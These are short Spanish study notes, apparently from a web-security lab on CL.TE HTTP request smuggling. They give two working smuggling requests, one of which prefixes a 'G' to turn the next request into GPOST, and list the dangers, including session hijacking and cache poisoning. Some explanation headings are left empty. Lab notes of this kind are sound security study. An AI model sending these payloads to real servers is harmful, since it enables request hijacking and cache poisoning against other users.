01 - HTTP request smuggling, basic CL.TE vulnerability

POST / HTTP/1.1
Host: vulnerable-website.com
Content-Length: 13
Transfer-Encoding: chunked

0

SMUGGLED

Frontend
13 Bytes -> 0\r\n\r\nSMUGGLED

Backend

Lee hasta 0r\n\r\n

SMUGGLED cuela como una nueva petición al backend


💥 ¿Por qué es esto peligroso?

1. Inyección de solicitudes

2. Bypass de seguridad

3. Secuestro de sesión

4. Cache poisoning


POST / HTTP/1.1
Host: YOUR-LAB-ID.web-security-academy.net
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 6
Transfer-Encoding: chunked

0

G

🔬 ¿Qué pasa realmente?

🔹 El servidor front-end:


🔹 El servidor back-end:


Cuando reenviemos la solicitud del repeater, se enviará un GPOST, porque se concatenará la G con la segunda petición.

Acordarse de usar HTTP1.1